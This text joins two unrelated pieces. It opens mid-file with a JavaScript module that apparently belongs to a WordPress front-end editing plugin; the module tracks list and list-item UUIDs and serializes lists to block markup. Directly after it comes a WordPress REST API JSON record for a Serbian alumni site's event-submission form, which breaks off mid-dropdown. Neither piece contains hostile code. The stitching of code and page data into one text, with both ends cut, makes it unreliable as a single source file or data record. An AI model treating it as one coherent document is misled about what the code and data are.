		return parentItem ? getDirectChildList(parentItem) : null;
	}

	/**
	 * Normalize one requested list-type value to a DOM tag name.
	 *
	 * @param   {*} value Candidate list-type value.
	 * @returns {string}  `OL`, `UL`, or an empty string.
	 */
	function normalizeListTypeTagName(value) {
		if (value === true) {
			return 'OL';
		}
		if (value === false) {
			return 'UL';
		}

		const normalized = String(value || '').trim().toLowerCase();
		if (normalized === 'ordered' || normalized === 'ol' || normalized === 'true') {
			return 'OL';
		}
		if (normalized === 'unordered' || normalized === 'ul' || normalized === 'false') {
			return 'UL';
		}

		return '';
	}

    const ListBlockTracker = {
        active: null,
        
        /**
         * Initialize tracker for a list element
         * @param {HTMLElement} listElement - The UL or OL element
         * @param {Object} originalBlock - The complete WordPress block structure
         */
        init(listElement, originalBlock = {}) {
            if (!createBlock || !serializeBlocks) {
				console.error('wp.blocks not available');
			}

            const tracker = {
                listElement,
                originalBlock: JSON.parse(JSON.stringify(originalBlock)),
                uuidMap: new Map(),  // uuid -> {type, attrs, element}
                domMap:  new WeakMap(),  // element -> uuid
                runtimeUuidMap: new Map(), // runtimeUuid -> {type, element}
                runtimeDomMap: new WeakMap() // element -> runtimeUuid
            };
            
			// Attach tracker to element to avoid singleton issues
    		listElement._mwpListTracker = tracker;

            // Build UUID tracking from DOM and original block structure
            this.buildFromDOM(tracker, listElement, originalBlock);
            this.active = tracker;
            return tracker;
        },
        
        /**
         * Build UUID mappings from DOM and original block structure
         * Assigns UUIDs to all lists and list items, mapping to their original attrs
         */
        buildFromDOM(tracker, listElement, originalBlock) {
			const previousEntries = tracker.uuidMap instanceof Map
				? new Map(tracker.uuidMap)
				: new Map();
			const previousRuntimeEntries = tracker.runtimeUuidMap instanceof Map
				? new Map(tracker.runtimeUuidMap)
				: new Map();

            tracker.uuidMap.clear();
            tracker.domMap = new WeakMap();
            tracker.runtimeUuidMap.clear();
            tracker.runtimeDomMap = new WeakMap();
            tracker.listElement = listElement;
			this.syncEditableTextSurfaces(listElement);
            
			this.registerRuntimeIdentity(
				tracker,
				listElement,
				'list',
				previousRuntimeEntries
			);

            // Assign UUID to root list and map to original attrs
            const rootUuid = this.getOrCreateUuid(listElement, 'list');
			const previousRootEntry = previousEntries.get(rootUuid);
            tracker.uuidMap.set(rootUuid, {
                type:    'list',
                attrs:   previousRootEntry?.attrs
					? cloneListAttrs(previousRootEntry.attrs, true)
					: cloneListAttrs(originalBlock.attrs || {}, true),
                element: listElement
            });
            tracker.domMap.set(listElement, rootUuid);
            
            // Recursively process list structure
            this.processListRecursive(
				tracker,
				listElement,
				originalBlock.innerBlocks || [],
				previousEntries,
				previousRuntimeEntries
			);
        },
        
        /**
         * Recursively process list items and nested lists, assigning UUIDs
         */
        processListRecursive(
			tracker,
			listElement,
			originalItems,
			previousEntries = new Map(),
			previousRuntimeEntries = new Map()
		) {
            const items = getDirectListItems(listElement);
            
            items.forEach((li, index) => {
				this.syncEditableTextSurfaces(li);
                const originalItem = originalItems[index] || {};
				this.registerRuntimeIdentity(
					tracker,
					li,
					'item',
					previousRuntimeEntries
				);
                const itemUuid     = this.getOrCreateUuid(li, 'item');
				const previousItemEntry = previousEntries.get(itemUuid);
                
                // Map UUID to original item attrs
                tracker.uuidMap.set(itemUuid, {
                    type:    'item',
                    attrs:   previousItemEntry?.attrs
						? JSON.parse(JSON.stringify(previousItemEntry.attrs || {}))
						: JSON.parse(JSON.stringify(originalItem.attrs || {})),
                    element: li
                });
                tracker.domMap.set(li, itemUuid);
                
                // Handle nested lists
                const nestedList = getDirectChildList(li);
                if (nestedList) {
                    const originalNested = originalItem.innerBlocks?.[0] || {};
					this.registerRuntimeIdentity(
						tracker,
						nestedList,
						'list',
						previousRuntimeEntries
					);
                    const nestedUuid     = this.getOrCreateUuid(nestedList, 'list');
					const previousNestedEntry = previousEntries.get(nestedUuid);
                    
                    // Map nested list attrs without plugin UUID ownership.
                    // The tracker still needs a temporary DOM identity for list
                    // editing, but persisting mwpSfeUuid* on nested lists would
                    // fracture one logical list into multiple save/history roots.
                    tracker.uuidMap.set(nestedUuid, {
                        type:    'list',
                        attrs:   previousNestedEntry?.attrs
							? cloneListAttrs(previousNestedEntry.attrs, false)
							: cloneListAttrs(originalNested.attrs || {}, false),
                        element: nestedList
                    });
                    tracker.domMap.set(nestedList, nestedUuid);
                    
                    // Recurse into nested list
                    this.processListRecursive(
						tracker,
						nestedList,
						originalNested.innerBlocks || [],
						previousEntries,
						previousRuntimeEntries
					);
                }
            });
        },

		/**
		 * Register one list or list-item runtime identity on the tracker.
		 *
		 * @param   {Object}   tracker                Active list tracker.
		 * @param   {Element}  element                Live list or list-item element.
		 * @param   {string}   type                   Supported runtime identity type.
		 * @param   {Map}      previousRuntimeEntries Previous runtime entry map.
		 * @returns {string}                          Resolved runtime UUID.
		 */
		registerRuntimeIdentity(
			tracker,
			element,
			type,
			previousRuntimeEntries = new Map()
		) {
			const runtimeUuid = this.getOrCreateRuntimeUuid(
				tracker,
				element,
				type,
				previousRuntimeEntries
			);
			if (!runtimeUuid) {
				return '';
			}

			tracker.runtimeUuidMap.set(runtimeUuid, {
				type,
				element,
			});
			tracker.runtimeDomMap.set(element, runtimeUuid);
			return runtimeUuid;
		},

		/**
		 * Return whether one runtime UUID is already owned by a different element.
		 *
		 * Native contenteditable list splitting can clone DOM attributes from the
		 * source item into the newly created sibling. When that happens, the new
		 * runtime UUID must be reseeded so each live cursor target stays unique.
		 *
		 * @param   {Object}        tracker     Active list tracker.
		 * @param   {string}        runtimeUuid Candidate runtime UUID.
		 * @param   {Element|null}  element     Element requesting that UUID.
		 * @returns {boolean}                  True when the UUID belongs elsewhere.
		 */
		isRuntimeUuidClaimedByDifferentElement(tracker, runtimeUuid, element) {
			const normalizedRuntimeUuid = normalizeRuntimeUuid(runtimeUuid);
			if (!tracker?.runtimeUuidMap || !normalizedRuntimeUuid) {
				return false;
			}

			const existingEntry = tracker.runtimeUuidMap.get(normalizedRuntimeUuid);
			return !!(existingEntry?.element && existingEntry.element !== element);
		},
        
        /**
         * Get the inherited structural ID for an element or seed it from the
         * runtime UUID when it does not exist yet.
         *
         * Structural IDs may be intentionally copied by native list splitting so
         * related items can retain style inheritance. They are not treated as
         * unique runtime cursor identifiers.
         */
        getOrCreateUuid(element, type) {
            const attrName = type === 'list' ? LIST_ID_ATTR : LIST_ITEM_ID_ATTR;
            let uuid       = element.getAttribute(attrName);
            
            if (!uuid) {
                uuid = normalizeRuntimeUuid(
					element.getAttribute(
						type === 'list'
							? LIST_RUNTIME_UUID_ATTR
							: LIST_ITEM_RUNTIME_UUID_ATTR
					)
				) || this.generateTempUuid();
                element.setAttribute(attrName, uuid);
            }
            
            return uuid;
        },

		/**
		 * Return the existing runtime UUID for one element or create one.
		 *
		 * Caller-supplied runtime UUIDs win for newly created items/lists. When an
		 * element already belongs to the previous tracker build, its existing
		 * runtime UUID is preserved so API references remain stable across rebuilds.
		 *
		 * @param   {Object}  tracker                Active list tracker.
		 * @param   {Element} element                Live list or list-item element.
		 * @param   {string}  type                   Supported runtime identity type.
		 * @param   {Map}     previousRuntimeEntries Previous runtime entry map.
		 * @returns {string}                         Session-scoped runtime UUID.
		 */
		getOrCreateRuntimeUuid(
			tracker,
			element,
			type,
			previousRuntimeEntries = new Map()
		) {
			const attrName = getRuntimeUuidAttributeName(type);
			if (!attrName || !isRuntimeIdentityElement(element, type)) {
				return '';
			}

			let runtimeUuid = normalizeRuntimeUuid(element.getAttribute(attrName));
			if (!runtimeUuid) {
				for (const [candidateUuid, entry] of previousRuntimeEntries.entries()) {
					if (entry?.element === element && entry.type === type) {
						runtimeUuid = normalizeRuntimeUuid(candidateUuid);
						break;
					}
				}
			}

			if (this.isRuntimeUuidClaimedByDifferentElement(tracker, runtimeUuid, element)) {
				runtimeUuid = '';
			}

			if (!runtimeUuid) {
				runtimeUuid = this.generateTempUuid();
			}

			element.setAttribute(attrName, runtimeUuid);
			return runtimeUuid;
		},
        
        /**
         * Generate a RFC4122 version 4 UUID
         */
        generateTempUuid() {
            return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
                const r = Math.random() * 16 | 0;
                const v = c === 'x' ? r : (r & 0x3 | 0x8);
                return v.toString(16);
            });
        },

		/**
		 * Return the zero-based tree path for one list item inside the tracked list.
		 *
		 * @param   {Object}          tracker   Active list tracker.
		 * @param   {HTMLLIElement}   listItem  Candidate list item.
		 * @returns {number[]|null}            Zero-based indexes, or null on failure.
		 */
		getPathIndexesForItem(tracker, listItem) {
			if (
				!tracker?.listElement ||
				!listItem ||
				listItem.nodeType !== Node.ELEMENT_NODE ||
				listItem.tagName !== 'LI' ||
				!tracker.listElement.contains(listItem)
			) {
				return null;
			}

			const indexes = [];
			let currentItem = listItem;
			while (currentItem && tracker.listElement.contains(currentItem)) {
				const parentList = currentItem.parentElement;
				if (!parentList || (parentList.tagName !== 'UL' && parentList.tagName !== 'OL')) {
					return null;
				}

				const siblingItems = getDirectListItems(parentList);
				const itemIndex = siblingItems.indexOf(currentItem);
				if (itemIndex < 0) {
					return null;
				}

				indexes.unshift(itemIndex);
				const nextItem = parentList.closest('li');
				if (!nextItem || !tracker.listElement.contains(nextItem)) {
					break;
				}
				currentItem = nextItem;
			}

			return indexes.length ? indexes : null;
		},

		/**
		 * Return the direct list item currently living at one tree path.
		 *
		 * @param   {Object}               tracker    Active list tracker.
		 * @param   {string|Array<number>} pathValue  Zero-based path value.
		 * @returns {HTMLLIElement|null}              Matching list item.
		 */
		getItemByPath(tracker, pathValue) {
			const indexes = normalizePathIndexes(pathValue);
			if (!tracker?.listElement || !Array.isArray(indexes) || !indexes.length) {
				return null;
			}

			let currentList = tracker.listElement;
			let currentItem = null;

			for (let index = 0; index < indexes.length; index++) {
				const itemIndex = indexes[index];
				const siblingItems = getDirectListItems(currentList);
				currentItem = siblingItems[itemIndex] || null;
				if (!currentItem) {
					return null;
				}

				if (index === indexes.length - 1) {
					return currentItem;
				}

				currentList = getDirectChildList(currentItem);
				if (!currentList) {
					return null;
				}
			}

			return currentItem;
		},

		/**
		 * Resolve one list element back to its public list path.
		 *
		 * The root list is addressed as an empty string. Nested child lists are
		 * addressed by the path of the parent list item that owns them.
		 *
		 * @param   {Object|null}      tracker     Active list tracker.
		 * @param   {HTMLElement|null} listElement Candidate list element.
		 * @returns {string}                      Root-relative list path.
		 */
		getPathForList(tracker, listElement) {
			if (!tracker) tracker = this.active;
			if (!tracker?.listElement || !listElement || listElement.nodeType !== Node.ELEMENT_NODE) {
				return '';
			}

			if (listElement === tracker.listElement) {
				return '';
			}

			const parentItem = (
				listElement.parentElement &&
				listElement.parentElement.tagName === 'LI'
			)
				? listElement.parentElement
				: null;
			if (!parentItem) {
				return '';
			}

			const indexes = this.getPathIndexesForItem(tracker, parentItem);
			return Array.isArray(indexes) ? indexes.join('_') : '';
		},

		/**
		 * Return one tracked list item by runtime UUID.
		 *
		 * @param   {Object|null}      tracker      Active list tracker.
		 * @param   {string}           runtimeUuid  Session-scoped item UUID.
		 * @returns {HTMLLIElement|null}            Matching list item.
		 */
		getItemByRuntimeUuid(tracker, runtimeUuid) {
			if (!tracker) tracker = this.active;
			const element = findElementByRuntimeUuid(tracker, runtimeUuid, 'item');
			return element && element.tagName === 'LI' ? element : null;
		},

		/**
		 * Return one tracked list by runtime UUID.
		 *
		 * @param   {Object|null}      tracker      Active list tracker.
		 * @param   {string}           runtimeUuid  Session-scoped list UUID.
		 * @returns {HTMLElement|null}              Matching list element.
		 */
		getListByRuntimeUuid(tracker, runtimeUuid) {
			if (!tracker) tracker = this.active;
			const element = findElementByRuntimeUuid(tracker, runtimeUuid, 'list');
			return isListElementForRuntimeLookup(element) ? element : null;
		},

		/**
		 * Return the runtime UUID for one tracked list item.
		 *
		 * @param   {Object|null}      tracker   Active list tracker.
		 * @param   {HTMLLIElement}    listItem  Live list item.
		 * @returns {string}                    Session-scoped item UUID.
		 */
		getRuntimeUuidForItem(tracker, listItem) {
			if (!tracker) tracker = this.active;
			if (!tracker?.listElement || !listItem || listItem.tagName !== 'LI') {
				return '';
			}

			return normalizeRuntimeUuid(
				listItem.getAttribute(LIST_ITEM_RUNTIME_UUID_ATTR)
					|| tracker.runtimeDomMap?.get(listItem)
			);
		},

		/**
		 * Return the runtime UUID for one tracked list.
		 *
		 * @param   {Object|null}      tracker     Active list tracker.
		 * @param   {HTMLElement}      listElement Live list element.
		 * @returns {string}                      Session-scoped list UUID.
		 */
		getRuntimeUuidForList(tracker, listElement) {
			if (!tracker) tracker = this.active;
			if (!tracker?.listElement || !isListElementForRuntimeLookup(listElement)) {
				return '';
			}

			return normalizeRuntimeUuid(
				listElement.getAttribute(LIST_RUNTIME_UUID_ATTR)
					|| tracker.runtimeDomMap?.get(listElement)
			);
		},
        
        /**
         * Parse current DOM list structure to WordPress block format
         * Uses UUID to preserve original attrs, updates only content and ordered
         *
         * @param {HTMLElement} listElement         Live UL/OL element.
         * @param {Object}      tracker             Active list tracker.
         * @param {boolean}     allowUuidOwnership  True only for the outermost
         *                                          core/list. Nested lists must
         *                                          serialize without persisted
         *                                          plugin UUID attrs.
         */
        parseListToBlock(listElement, tracker, allowUuidOwnership = true) {
			const isOrdered = listElement.tagName === 'OL';
			const uuid      = listElement.getAttribute(LIST_ID_ATTR);
			let attrs       = { ordered: isOrdered };

			if (uuid && tracker && tracker.uuidMap.has(uuid)) {
				const original      = tracker.uuidMap.get(uuid);
				const originalAttrs = (Array.isArray(original.attrs) || !original.attrs)
					? {}
					: cloneListAttrs(original.attrs, allowUuidOwnership);
				attrs = { ...originalAttrs, ordered: isOrdered };
			}

			const listItems   = Array.from(listElement.children).filter(el => el.tagName === 'LI');
			const innerBlocks = listItems.map(li => this.parseListItemToBlock(li, tracker));

			return createBlock('core/list', attrs, innerBlocks);
		},
        
        /**
         * Parse a list item to WordPress block format
         * Preserves original attrs if UUID exists
         */
        parseListItemToBlock(liElement, tracker) {
			const uuid = liElement.getAttribute(LIST_ITEM_ID_ATTR);
			let attrs  = {};

			if (uuid && tracker && tracker.uuidMap.has(uuid)) {
				const original = tracker.uuidMap.get(uuid);
				attrs = JSON.parse(JSON.stringify(original.attrs || {}));
			}

			// Recurse into nested list using the live element before cloning
			const innerBlocks  = [];
			const nestedListEl = liElement.querySelector(':scope > ul, :scope > ol');
			if (nestedListEl) {
				innerBlocks.push(this.parseListToBlock(nestedListEl, tracker, false));
			}

			const clone         = liElement.cloneNode(true);
			const directSurface = clone.querySelector(`:scope > [${LIST_ITEM_TEXT_ATTR}="1"]`);
			let content         = '';

			if (directSurface) {
				const cleanedSurface = this.cleanElement(directSurface);
				content = cleanedSurface.innerHTML.trim();
			} else {
				const nestedInClone = clone.querySelector(':scope > ul, :scope > ol');
				if (nestedInClone) nestedInClone.remove();

				const cleaned = this.cleanElement(clone);
				content = cleaned.innerHTML.trim();
			}

			return createBlock('core/list-item', { ...attrs, content }, innerBlocks);
		},

        /**
         * Clean element using ElementPrep
         * Removes editing artifacts while preserving UUIDs and content
         */
        cleanElement(element) {
            if (SFE.ElementPrep) {
                return SFE.ElementPrep.clean(element, {
                    removeIdentity: true,
                    removeControls: true,
                    clone:          false  // Already working with a clone
                });
            }
            
            console.error('ElementPrep not found');
            return element;
        },
        
        /**
         * Serialize the current list structure to WordPress block format
         * Preserves all original attrs, updates only content and ordered
         */
        serialize(tracker) {
			if (!tracker) tracker = this.active;
			if (!tracker) return null;

			const block = this.parseListToBlock(tracker.listElement, tracker);
			return serializeBlocks([block]);
		},
        
        /**
         * Update the tracker's element reference
         * Used when the list element is replaced (e.g., OL to UL conversion)
         */
		updateElement(tracker, newElement) {
            if (!tracker) tracker = this.active;
            if (!tracker) return;

			// Ensure new element keeps the tracker reference
    		newElement._mwpListTracker = tracker;
			this.syncEditableTextSurfaces(newElement);
            
            tracker.listElement = newElement;
            
            // Update element references in uuidMap
            tracker.uuidMap.forEach((value, key) => {
                if (value.type === 'list') {
                    const newEl = newElement.querySelector(`[${LIST_ID_ATTR}="${key}"]`) || 
                                 (newElement.getAttribute(LIST_ID_ATTR) === key ? newElement : null);
                    if (newEl) {
                        value.element = newEl;
                    }
                } else if (value.type === 'item') {
                    const newEl = newElement.querySelector(`[${LIST_ITEM_ID_ATTR}="${key}"]`);
                    if (newEl) {
                        value.element = newEl;
                    }
                }
            });

			tracker.runtimeUuidMap.forEach((value, key) => {
				if (value.type === 'list') {
					const newEl = this.getListByRuntimeUuid(tracker, key);
					if (newEl) {
						value.element = newEl;
						tracker.runtimeDomMap.set(newEl, key);
					}
				} else if (value.type === 'item') {
					const newEl = this.getItemByRuntimeUuid(tracker, key);
					if (newEl) {
						value.element = newEl;
						tracker.runtimeDomMap.set(newEl, key);
					}
				}
			});
        },

		/**
		 * Return one tree-aware structural snapshot for the active list.
		 *
		 * @param   {Object|null} tracker Active list tracker.
		 * @returns {Object|null}         Lightweight structure snapshot.
		 */
		getStructure(tracker) {
			if (!tracker) tracker = this.active;
			if (!tracker?.listElement) {
				return null;
			}

			const buildListNode = (listElement, listPath = '', parentIndexes = []) => ({
				listUuid: this.getRuntimeUuidForList(tracker, listElement),
				listPath,
				ordered: listElement.tagName === 'OL',
				items: getDirectListItems(listElement).map((listItem, index) => {
					const indexes = [ ...parentIndexes, index ];
					const pathMeta = buildPathMeta(indexes);
					const directSurface = ensureDirectItemTextSurface(listItem);
					const nestedList = getDirectChildList(listItem);

					return {
						itemUuid: this.getRuntimeUuidForItem(tracker, listItem),
						path: pathMeta.path,
						pathLabel: pathMeta.pathLabel,
						depth: pathMeta.depth,
						contentHtml: directSurface ? directSurface.innerHTML.trim() : '',
						childList: nestedList
							? buildListNode(nestedList, pathMeta.path, indexes)
							: null,
					};
				}),
			});

			return buildListNode(tracker.listElement, '', []);
		},

		/**
		 * Apply one primitive structural list operation against the live tracked
		 * DOM.
		 *
		 * Public API calls are translated into this lower-level operation set by
		 * the shared schema executor so the tracker only needs to understand the
		 * canonical primitive mutation layer.
		 *
		 * Supported primitive kinds:
		 * - `insert_list_item`
		 * - `remove_list_item`
		 * - `move_list_item`
		 * - `indent_list_item`
		 * - `outdent_list_item`
		 * - `update_list_item_text`
		 * - `toggle_list_type`
		 *
		 * @param   {Object|null} tracker      Active list tracker.
		 * @param   {Object}      rawOperation Structural operation payload.
		 * @returns {Object|null}              Result summary when applied.
		 */
		applyOperation(tracker, rawOperation, options = {}) {
			if (!tracker) tracker = this.active;
			if (!tracker?.listElement || !rawOperation || typeof rawOperation !== 'object') {
				return null;
			}

			const kind = typeof rawOperation.kind === 'string' ? rawOperation.kind.trim().toLowerCase() : '';
			const path = rawOperation.path ?? rawOperation.itemPath ?? rawOperation.item_path ?? '';
			const listItem = this.getItemByPath(tracker, path);
			let didApply = false;

			if (kind === 'remove_list_item' && listItem) {
				didApply = applyRemoveListItemOperation(tracker, listItem);
			} else if (kind === 'indent_list_item' && listItem) {
				didApply = applyIndentListItemOperation(tracker, listItem);
			} else if (kind === 'outdent_list_item' && listItem) {
				didApply = applyOutdentListItemOperation(tracker, listItem);
			} else if (kind === 'toggle_list_type') {
				didApply = applyToggleListTypeOperation(tracker, rawOperation, options);
			} else if (kind === 'update_list_item_text' && listItem) {
				didApply = applyUpdateListItemTextOperation(listItem, rawOperation);
			} else if (kind === 'insert_list_item') {
				didApply = applyInsertListItemOperation(tracker, rawOperation, this);
			} else if (kind === 'move_list_item' && listItem) {
				didApply = applyMoveListItemOperation(tracker, listItem, rawOperation, this);
			}

			if (!didApply) {
				return null;
			}

			this.syncEditableTextSurfaces(tracker.listElement);
			this.buildFromDOM(tracker, tracker.listElement, tracker.originalBlock || {});

			return {
				kind,
				structure: this.getStructure(tracker),
			};
		},

		/**
		 * Ensure every list item in one tree has one direct text surface.
		 *
		 * @param   {HTMLElement|null} rootElement Candidate list root or list item.
		 * @returns {HTMLElement|null}            Normalized root element.
		 */
		syncEditableTextSurfaces(rootElement) {
			if (!rootElement || rootElement.nodeType !== Node.ELEMENT_NODE) {
				return null;
			}

			if (rootElement.tagName === 'LI') {
				ensureDirectItemTextSurface(rootElement);
				Array.from(rootElement.children || [])
					.filter(child => isNestedListNode(child))
					.forEach(childList => this.syncEditableTextSurfaces(childList));
				return rootElement;
			}

			if (rootElement.tagName !== 'UL' && rootElement.tagName !== 'OL') {
				return rootElement;
			}

			Array.from(rootElement.children || [])
				.filter(child => child.tagName === 'LI')
				.forEach(li => this.syncEditableTextSurfaces(li));
			return rootElement;
		},

		/**
		 * Ensure runtime UUID attributes are unique within one live list tree.
		 *
		 * Native contenteditable list splitting can clone `li` and nested list
		 * attributes verbatim before FrontEdit regains control. This pass reseeds only the
		 * session-scoped runtime UUID attributes so freshly created structures become
		 * distinct live API/editor targets immediately, while leaving `data-item-id`
		 * and `data-list-id` untouched for their separate responsibilities.
		 *
		 * @param   {HTMLElement|null} rootElement Candidate list root.
		 * @returns {HTMLElement|null}            Normalized root element.
		 */
		ensureUniqueRuntimeUuids(rootElement) {
			if (
				!rootElement ||
				rootElement.nodeType !== Node.ELEMENT_NODE ||
				(rootElement.tagName !== 'UL' && rootElement.tagName !== 'OL')
			) {
				return rootElement || null;
			}

			const seenListRuntimeUuids = new Set();
			const seenItemRuntimeUuids = new Set();
			const collectLists = [ rootElement, ...Array.from(rootElement.querySelectorAll('ul, ol')) ];
			const collectItems = Array.from(rootElement.querySelectorAll('li'));

			collectLists.forEach(listElement => {
				const runtimeUuid = normalizeRuntimeUuid(
					listElement.getAttribute(LIST_RUNTIME_UUID_ATTR)
				);
				if (!runtimeUuid) {
					return;
				}

				if (seenListRuntimeUuids.has(runtimeUuid)) {
					listElement.setAttribute(LIST_RUNTIME_UUID_ATTR, this.generateTempUuid());
					return;
				}

				seenListRuntimeUuids.add(runtimeUuid);
			});

			collectItems.forEach(listItem => {
				const runtimeUuid = normalizeRuntimeUuid(
					listItem.getAttribute(LIST_ITEM_RUNTIME_UUID_ATTR)
				);
				if (!runtimeUuid) {
					return;
				}

				if (seenItemRuntimeUuids.has(runtimeUuid)) {
					listItem.setAttribute(LIST_ITEM_RUNTIME_UUID_ATTR, this.generateTempUuid());
					return;
				}

				seenItemRuntimeUuids.add(runtimeUuid);
			});

			return rootElement;
		},

		/**
		 * Ensure one live list tree has the required structural IDs and runtime UUIDs.
		 *
		 * On first editor activation, list elements may not yet have either identity
		 * attribute family. Seed both from one generated UUID per element so the
		 * initial history snapshot captures stable targeting data. Later native list
		 * splits may intentionally copy the structural IDs; in those cases this pass
		 * preserves the structural IDs and only reseeds duplicated runtime UUIDs.
		 *
		 * @param   {HTMLElement|null} rootElement Candidate list root.
		 * @returns {HTMLElement|null}            Normalized root element.
		 */
		ensureIdentityAttributes(rootElement) {
			if (
				!rootElement ||
				rootElement.nodeType !== Node.ELEMENT_NODE ||
				(rootElement.tagName !== 'UL' && rootElement.tagName !== 'OL')
			) {
				return rootElement || null;
			}

			const syncIdentityPair = (element, structuralAttrName, runtimeAttrName) => {
				if (!element || element.nodeType !== Node.ELEMENT_NODE) {
					return;
				}

				let structuralId = normalizeRuntimeUuid(
					element.getAttribute(structuralAttrName)
				);
				let runtimeUuid = normalizeRuntimeUuid(
					element.getAttribute(runtimeAttrName)
				);

				if (!structuralId && !runtimeUuid) {
					runtimeUuid = this.generateTempUuid();
					structuralId = runtimeUuid;
				} else if (!runtimeUuid) {
					runtimeUuid = structuralId;
				} else if (!structuralId) {
					structuralId = runtimeUuid;
				}

				element.setAttribute(structuralAttrName, structuralId);
				element.setAttribute(runtimeAttrName, runtimeUuid);
			};

			syncIdentityPair(rootElement, LIST_ID_ATTR, LIST_RUNTIME_UUID_ATTR);

			Array.from(rootElement.querySelectorAll('ul, ol')).forEach(listElement => {
				syncIdentityPair(listElement, LIST_ID_ATTR, LIST_RUNTIME_UUID_ATTR);
			});

			Array.from(rootElement.querySelectorAll('li')).forEach(listItem => {
				syncIdentityPair(listItem, LIST_ITEM_ID_ATTR, LIST_ITEM_RUNTIME_UUID_ATTR);
			});

			return this.ensureUniqueRuntimeUuids(rootElement);
		},

		getDirectItemTextSurface,

		normalizePathIndexes,

		buildPathMeta,

		getRuntimeUuidAttributeName,

		getListRuntimeUuidAttributeName() {
			return LIST_RUNTIME_UUID_ATTR;
		},

		getListItemRuntimeUuidAttributeName() {
			return LIST_ITEM_RUNTIME_UUID_ATTR;
		},

		getListIdAttributeName() {
			return LIST_ID_ATTR;
		},

		getListItemIdAttributeName() {
			return LIST_ITEM_ID_ATTR;
		},
        
        /**
         * Destroy tracker and clean up
         */
        destroy(tracker) {
			if (!tracker) tracker = this.active;
			if (!tracker) return;

			tracker.uuidMap.clear();
			tracker.runtimeUuidMap.clear();
			if (tracker.listElement) {
				delete tracker.listElement._mwpListTracker;
			}
			if (this.active === tracker) this.active = null;
		}
    };

	/**
	 * Return whether one element is a live list node for runtime lookup helpers.
	 *
	 * @param   {Element|null} element Candidate DOM element.
	 * @returns {boolean}              True when the element is `UL` or `OL`.
	 */
	function isListElementForRuntimeLookup(element) {
		return !!(
			element &&
			element.nodeType === Node.ELEMENT_NODE &&
			(element.tagName === 'UL' || element.tagName === 'OL')
		);
	}

    // Expose globally
    SFE.ListBlockTracker = ListBlockTracker;

})();
{"id":2338,"date":"2024-02-03T22:14:36","date_gmt":"2024-02-03T21:14:36","guid":{"rendered":"https:\/\/alumni.pr.ac.rs\/%d0%bf%d0%be%d1%81%d1%82%d0%b0%d0%b2%d0%b8%d1%82%d0%b5-%d0%b4%d0%be%d0%b3%d0%b0%d1%92%d0%b0%d1%98\/"},"modified":"2024-02-03T22:14:36","modified_gmt":"2024-02-03T21:14:36","slug":"%d0%bf%d0%be%d1%81%d1%82%d0%b0%d0%b2%d0%b8%d1%82%d0%b5-%d0%b4%d0%be%d0%b3%d0%b0%d1%92%d0%b0%d1%98","status":"publish","type":"page","link":"https:\/\/alumni.pr.ac.rs\/en\/%d0%bf%d0%be%d1%81%d1%82%d0%b0%d0%b2%d0%b8%d1%82%d0%b5-%d0%b4%d0%be%d0%b3%d0%b0%d1%92%d0%b0%d1%98\/","title":{"rendered":"\u041f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u0435 \u0434\u043e\u0433\u0430\u0452\u0430\u0458"},"content":{"rendered":"<form action=\"\/en\/wp-json\/wp\/v2\/pages\/2338\" method=\"post\" id=\"submit-event-form\" class=\"wpem-form-wrapper wpem-main event-manager-form\" enctype=\"multipart\/form-data\" data-trp-original-action=\"\/en\/wp-json\/wp\/v2\/pages\/2338\">\r\n\t\t<div class=\"wpem-form-group\">\r\n\t\t<label class=\"wpem-form-label-text\">Have an account?<\/label>\r\n\t\t<div class=\"field account-sign-in wpem-alert wpem-alert-info\">\r\n\t\t\t<a href=\"https:\/\/alumni.pr.ac.rs\/wp-login.php\">Sign in<\/a>\r\n\t\t\t\t\t\t\tIf you don&rsquo;t have an account with us, just enter your email address and create a new one.  You will receive your password shortly in your email.\t\t\t\t\t<\/div>\r\n\t<\/div>\r\n\t\t\t\t\t<div class=\"wpem-form-group fieldset-create_account_email\">\r\n\t\t\t\t\t<label class=\"wpem-form-label-text\" for=\"create_account_email\">Your email<span class=\"require-field\">*<\/span><\/label>\r\n\t\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t\t<input type=\"text\" class=\"input-text create_account_email\" name=\"create_account_email\" id=\"create_account_email\" placeholder=\"you@yourdomain.com\" attribute=\"\" value=\"\" maxlength=\"\" required \/>\r\n\t\t\t\t\t<\/div>\r\n\t\t\t\t<\/div>\r\n\t\t\t\t<!-- Event Information Fields -->\r\n\t\t<h2 class=\"wpem-form-title wpem-heading-text\">Event Details<\/h2>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_title\">\r\n\t\t\t\t<label for=\"event_title\">\r\n\t\t\t\t\t\u041d\u0430\u0441\u043b\u043e\u0432 \u0434\u043e\u0433\u0430\u0452\u0430\u0458\u0430<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<input type=\"text\" class=\"input-text event_title\" name=\"event_title\" id=\"event_title\" placeholder=\"Event title\" attribute=\"\" value=\"\" maxlength=\"\" required \/>\r\n\t\t\t\t<\/div>\r\n\t\t\t<\/fieldset>\r\n\t\t\t\t\t<fieldset class=\"wpem-form-group fieldset-event_type\">\r\n\t\t\t\t<label for=\"event_type\">\r\n\t\t\t\t\t\u0422\u0438\u043f \u0434\u043e\u0433\u0430\u0452\u0430\u0458\u0430<span class=\"require-field\">*<\/span>\t\t\t\t<\/label>\r\n\t\t\t\t<div class=\"field required-field\">\r\n\t\t\t\t\t<select  name='event_type' id='event_type' class='postform'>\n\t<option value='0'>Choose an Event Type<\/option>\n\t<option class=\"level-0\" value=\"46\">Appearance or Signing<\/option>\n\t<option class=\"level-0\" value=\"47\">Attraction<\/option>\n\t<option class=\"level-0\" value=\"48\">Camp, Trip, or Retreat<\/option>\n\t<option class=\"level-0\" value=\"49\">Class, Training, or Workshop<\/option>\n\t<option class=\"level-0\" value=\"50\">Concert or Performance<\/option>\n\t<option class=\"level-0\" value=\"51\">Conference<\/option>\n\t<option class=\"level-0\" value=\"52\">Convention<\/option>\n\t<option class=\"level-0\" value=\"53\">Dinner or Gala<\/option>\n\t<option class=\"level-0\" value=\"54\">Festival or Fair<\/option>\n\t<option class=\"level-0\" value=\"55\">Game or Competition<\/option>\n\t<option class=\"level-0\" value=\"56\">Meeting or Networking Event<\/option>\n\t<option class=\"level-0\" value=\"57\">Other<\/option>\n\t<option class=\"level-1\" value=\"80\">&nbsp;&nbsp;&nbsp;Exhibition<\/option>\n\t<option class=\"level-1\" 